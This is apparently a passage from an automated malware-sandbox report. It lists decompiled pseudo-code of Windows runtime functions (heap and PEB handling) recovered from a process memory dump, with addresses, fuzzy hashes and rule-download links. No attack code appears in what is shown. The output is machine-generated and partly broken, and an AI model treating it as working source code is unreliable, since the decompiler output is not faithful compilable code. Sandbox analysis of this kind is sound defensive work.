					_push( &_v36);
					_push(0x1e);
					_t88 = E0365B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L03634620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0361CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x3708504
								E0362FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E03644F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x03644bad
0x03644bbf
0x03644bc2
0x03644bc6
0x03644bcd
0x03644bd9
0x036867fe
0x03686800
0x03644ccc
0x03644ccd
0x03644cb7
0x03644cc9
0x03644cc9
0x03644bdf
0x03644be5
0x00000000
0x00000000
0x03644beb
0x03644bef
0x00000000
0x00000000
0x03644bf5
0x03644bf9
0x03644c06
0x03644c0b
0x03644c17
0x03644c1c
0x03644c1f
0x03644c25
0x03644c33
0x03644c3d
0x03644c40
0x03644c43
0x03644c47
0x03644c4d
0x03644c53
0x03644c54
0x03644c55
0x03644c56
0x03644c5b
0x03644c5c
0x03644c63
0x03644c6b
0x00000000
0x00000000
0x03686776
0x03686784
0x03686784
0x0368679f
0x036867a7
0x036867af
0x036867ce
0x00000000
0x036867b1
0x036867b7
0x036867b8
0x036867c1
0x036867d3
0x036867d9
0x036867dd
0x03644c94
0x03644c94
0x03644c98
0x03644c9c
0x03644ca3
0x036867f4
0x036867f4
0x03644cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x03644cb5
0x03644c79
0x03644c7e
0x03644c89
0x03644c8b
0x03644c8f
0x03644c8f
0x00000000
0x03644c89
0x036867c3
0x00000000
0x036867c3
0x036867af
0x03644c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51539cf31d8d4e7a709e878b9378b13c14d64c217dee97c4a1e48dbbbe2c98eb
Instruction ID: f6bb06fe9bab3fb0827dd1ac03a86e63e66ed389d835714018302355e6a4fa43
Opcode Fuzzy Hash: 51539cf31d8d4e7a709e878b9378b13c14d64c217dee97c4a1e48dbbbe2c98eb
Instruction Fuzzy Hash: EE41B935E40228DBCB21EF65C945BEEB7B8EF4A700F0541A9E908AB340DB74DE45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03644D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E03644D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x370d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0365FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x3707bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0365B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L03634620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0361CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0365B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0365F380(_t67 + 0xc, 0x35f5138, 0x10) == 0) {
								 *0x37060d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E03644F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E03644E70(0x37086b0, 0x3645690, 0, 0) != 0) {
					_t46 = E0361CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x03644d3b
0x03644d4d
0x03644d53
0x03644d58
0x03644d65
0x03644d6c
0x03644d71
0x03644d77
0x03644d7f
0x03644d8c
0x03644d8e
0x03644dad
0x03644db0
0x03644db7
0x03644db8
0x03644db9
0x03644dba
0x03644dbb
0x03644dc1
0x03644dc8
0x03644dcc
0x03644dd5
0x03644dde
0x03644ddf
0x03644de0
0x03644de1
0x03644de6
0x03644de7
0x03644de9
0x03644df3
0x00000000
0x00000000
0x03686c7c
0x03686c8a
0x03686c8a
0x03686c9d
0x03686ca7
0x03686cac
0x03686cb2
0x03686cb9
0x00000000
0x03686cbf
0x03686cbf
0x00000000
0x03686cbf
0x03686cb9
0x03644dfb
0x03686ccf
0x03686cd3
0x03644e32
0x03644e39
0x03686ce0
0x03686cf2
0x03686cf2
0x03686ce0
0x03644e3f
0x03644e41
0x03644e51
0x03644e51
0x03644e03
0x03644e03
0x03644e09
0x03644e0f
0x03644e57
0x00000000
0x00000000
0x03644e1b
0x03644e30
0x03644e5b
0x03644e5b
0x00000000
0x03644e30
0x03644e11
0x03644e11
0x03644e16
0x00000000
0x03644e16
0x03644e01
0x00000000
0x03644e01
0x03644da5
0x03686c6b
0x00000000
0x03644dab
0x03644dab
0x00000000
0x03644dab

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77ac246cab5e5db97212477171c4185c87b8d041ae5d6e7c9b1813f9ba82799e
Instruction ID: 42fa3b94cf9ce4dffdc574edff1f04ece1951d8501c84ff326e73c2adff867c2
Opcode Fuzzy Hash: 77ac246cab5e5db97212477171c4185c87b8d041ae5d6e7c9b1813f9ba82799e
Instruction Fuzzy Hash: 4F41F275A40318EFEB22DF15CD81F6AB7A9EB06610F0440A9E9459B381DB70DD40CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03628A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E03628A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x370d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0365B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0362E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x35f1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E03641DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03653C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E03628999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x03628a0a
0x03628a1c
0x03628a23
0x03628a2e
0x03628a30
0x03628a36
0x03628a3c
0x03628a3e
0x03628a4a
0x03628a52
0x03628a9c
0x03628aae
0x03628a58
0x03628a5e
0x03628a6a
0x03628a6f
0x03628a75
0x03628a7d
0x03628a85
0x03628a86
0x03628a89
0x03628a93
0x03628a99
0x03628a9b
0x00000000
0x03628aaf
0x03628abe
0x03628ac3
0x03628acb
0x03628ad7
0x03628ae0
0x03628af1
0x00000000
0x03628af1
0x03628acd
0x03628ad5
0x03628afb
0x03628afd
0x03628aff
0x03628b07
0x03628b22
0x03628b24
0x03628b2a
0x03628b2e
0x03628b3f
0x03628b78
0x03628b41
0x03628b52
0x03628b54
0x03628b5c
0x03628b74
0x03628b74
0x03628b5c
0x03628b3f
0x03628b5e
0x03628b61
0x03628b64
0x03628b64
0x03628b6c
0x03628b6c
0x03628b11
0x03679cd5
0x03679cd5
0x03628b17
0x03628b1a
0x03628b1a
0x00000000
0x03628ad5
0x03628a89

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01ba032e7a3c6a7291c86dc14567a3d91144e8992f7d6cd125460eac1aa723f0
Instruction ID: 0ee8f59c2dc6f802f82dddf7cc06d18af964871e8fcffa2da5aec1555f07eaed
Opcode Fuzzy Hash: 01ba032e7a3c6a7291c86dc14567a3d91144e8992f7d6cd125460eac1aa723f0
Instruction Fuzzy Hash: F34150B5A007389BDB24DF55CD88AA9BBF8EB44301F1645E9E81997351EB709E80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 036DFDE2, Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E036DFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E036DFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E036E0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E03637D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E036D1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E036E2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E036DC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E036DDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E03637D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E036DA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x036dfde7
0x036dfde8
0x036dfdec
0x036dfdee
0x036dfdf5
0x036dfdf7
0x036dfdfc
0x036dfe19
0x036dfe22
0x036dfe26
0x036dfec6
0x036dfecd
0x036dfed5
0x036dfee7
0x036dfed7
0x036dfee0
0x036dfee0
0x036dfeef
0x036dff00
0x036dff02
0x036dff07
0x036dff07
0x00000000
0x036dfeef
0x036dfe33
0x036dfe55
0x036dfe59
0x036dfe5b
0x036dfe5e
0x036dfe69
0x036dfe6d
0x036dfe6d
0x036dfe69
0x036dfe35
0x036dfe41
0x036dfe41
0x036dfe79
0x036dfe8b
0x036dfe7b
0x036dfe84
0x036dfe84
0x036dfe93
0x00000000
0x036dfea8
0x036dfeba
0x00000000
0x036dfeba
0x036dfdfe
0x036dfe01
0x036dfe02
0x036dfe08
0x036dff0c
0x036dff14
0x036dff14

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 79c2d6075ceb753b376c5adf20bdb35a9d761813292acbe534281a3bfd4703c7
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: BA310236B00744BFD322DB69C944F6ABBAAEBC5650F1C4458E8478F382DAB4DC42C724

Uniqueness

Uniqueness Score: -1.00%

Function 036DEA55, Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E036DEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E03632280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E036DE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0361F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0362FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E036DAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E036DBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E03637D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E036CFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0362FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E036DA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x036dea55
0x036dea66
0x036dea68
0x036dea6c
0x036dea6f
0x036dea72
0x036dea75
0x036dea7a
0x036dea7a
0x036dea7e
0x036dea80
0x036dea85
0x036dea8b
0x036deab5
0x036deabc
0x036deabf
0x036deabf
0x036deaca
0x036deace
0x036dead0
0x036deae4
0x036deaeb
0x036deaf0
0x036deaf5
0x036deb09
0x036deb0d
0x036deb1d
0x036deb2d
0x036deb38
0x036deb3d
0x036deb41
0x036deb4a
0x036deb60
0x036deb4c
0x036deb52
0x036deb59
0x036deb59
0x036deb68
0x036deb71
0x036deb71
0x036dea8d
0x036dea8f
0x036dea92
0x036dea97
0x036dea97
0x036dea9b
0x036dea9c
0x036dea9e
0x036deaa6
0x036deaa6
0x036deb7e

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 554726d69794a236aab49ecba4288e25707fb864cef5702802a4a3f503a96dea
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 5631B076A04705ABC719DF24C980A6BB7AAFFC5310F08492DF5568F744DE31E809CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 036969A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E036969A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x370d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L03626C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E03696BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03659980() >= 0) {
							E03632280(_t56, 0x3708778);
							_t77 = 1;
							_t68 = 1;
							if( *0x3708774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x3708774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0361B6F0(0x35fc338, 0x35fc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03659520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E036595D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0362FFB0(_t68, _t77, 0x3708778);
				}
				_pop(_t78);
				return E0365B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x036969b5
0x036969be
0x036969c3
0x036969c9
0x036969cc
0x036969d1
0x036969d3
0x036969de
0x036969e1
0x036969ea
0x036969f6
0x036969fe
0x03696a13
0x03696a14
0x03696a15
0x03696a16
0x03696a1e
0x03696a26
0x03696a31
0x03696a36
0x03696a37
0x03696a40
0x03696a49
0x03696a4a
0x03696a53
0x03696a59
0x03696a5d
0x03696a5e
0x03696a64
0x03696a67
0x03696a6a
0x03696a6d
0x03696a70
0x03696a77
0x03696a7d
0x03696a86
0x03696a89
0x03696a9c
0x03696a9f
0x03696aa2
0x03696aa5
0x03696aaf
0x03696ab1
0x03696ab8
0x03696ab9
0x03696abb
0x03696abe
0x03696ac5
0x03696ac5
0x03696aaf
0x03696a40
0x03696a26
0x036969fe
0x03696ace
0x03696ad0
0x03696ad3
0x03696ad8
0x03696adf
0x03696adf
0x03696ae8
0x03696aef
0x03696aef
0x03696af9
0x03696b06

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6797b1869ceb8a2021982d9322be4ce8a03abe22dd045e48e258abad0a4c5ee
Instruction ID: 367547e86bb4937c9a1e78fdb0622801247b2bfaec766fd27a4c3fc730d43ba5
Opcode Fuzzy Hash: d6797b1869ceb8a2021982d9322be4ce8a03abe22dd045e48e258abad0a4c5ee
Instruction Fuzzy Hash: D14158B1E00308AFDB24DFA5D940BAEBBF8EF48714F18812EE915A7250DB749905CB55

Uniqueness

Uniqueness Score: -1.00%

Function 03615210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E03615210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E036152A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E036595D0();
							L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0362EB70(_t54, 0x37079a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E036595D0();
								L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0362EB70(_t54, 0x37079a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0365F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0362EB70(_t54, 0x37079a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E036595D0();
							L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x03615220
0x03615224
0x03670d13
0x03670d16
0x03670d19
0x0361522a
0x0361522a
0x0361522d
0x0361522d
0x03615231
0x03615235
0x03615239
0x03670d5c
0x03670d62
0x00000000
0x00000000
0x03670d6a
0x03670d7b
0x03670d7f
0x03670d81
0x03670d84
0x03670d95
0x03670d95
0x03670d6c
0x03670d71
0x03670d71
0x03670d9a
0x00000000
0x0361524a
0x0361524a
0x03615250
0x03670d24
0x03670d35
0x03670d39
0x03670d3b
0x03670d3e
0x03670d50
0x03670d50
0x03670d26
0x03670d2b
0x03670d2b
0x00000000
0x03670d55
0x03615256
0x0361525b
0x03615265
0x03670da7
0x0361526b
0x0361526e
0x03615272
0x03670db1
0x03670db4
0x03670dc5
0x03670dc5
0x03615272
0x03615278
0x0361527e
0x0361528a
0x0361528c
0x0361528d
0x00000000
0x03615280
0x03615282
0x03615288
0x0361529f
0x03615292
0x00000000
0x03615292
0x00000000
0x03615288
0x0361527e

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6f77af159f34e825e3416dee70813d61716d777d79b52c034f8e8e74d0629af
Instruction ID: 887271657ea690ed4c98c90765c8baa2bf4850eef450a150b2f76e23ae79d363
Opcode Fuzzy Hash: c6f77af159f34e825e3416dee70813d61716d777d79b52c034f8e8e74d0629af
Instruction Fuzzy Hash: 52311432251710EBC725DF28CD80B66F7B5FF51720F594629F9560F2A0EB60E911C6A8

Uniqueness

Uniqueness Score: -1.00%

Function 0364A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0364A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x36f0220);
				E0366D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x3707b9c; // 0x0
				_t55 = L03634620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
